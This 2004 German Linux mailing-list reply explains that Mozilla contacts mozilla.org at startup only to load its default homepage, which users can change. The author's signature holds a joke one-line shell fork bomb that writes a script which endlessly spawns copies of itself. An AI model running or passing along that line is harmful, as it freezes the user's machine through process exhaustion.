[linux-l] Frage zu Erfahrungen mit Mozilla-ist er als Mailclient verwendbar?

Volker Mueller volker at flinux.in-berlin.de
Mo Jan 26 16:57:26 CET 2004

On Mon, Jan 26, 2004 at 04:38:37PM +0100, wi wi wrote:

> Mozilla hatte ich  vorhin probehalber installiert und
> das erste, was ich unter windows feststellen durfte,
> war, daß er beim Starten ins Netz und auf mozilla.org
> zugreifen will und das lange bevor das eigentliche
> Programm geladen und benutzbar ist.

AFAIK will er nur die "per default" eingestellte HomePatsch von Mozilla
als Startseite holen. Einfach was anderes einstellen und feddich. Lt.
meinen Logs hat sich's damit.

Gruss, Volker, jetzt endlich mit Mozilla statt Netscape 4.5 - wat'n
Sprung!

--
Volker Mueller
volker at flinux:~> echo sh _\& sh _\& > _; sh _ # Bomben zu Bierhumpen!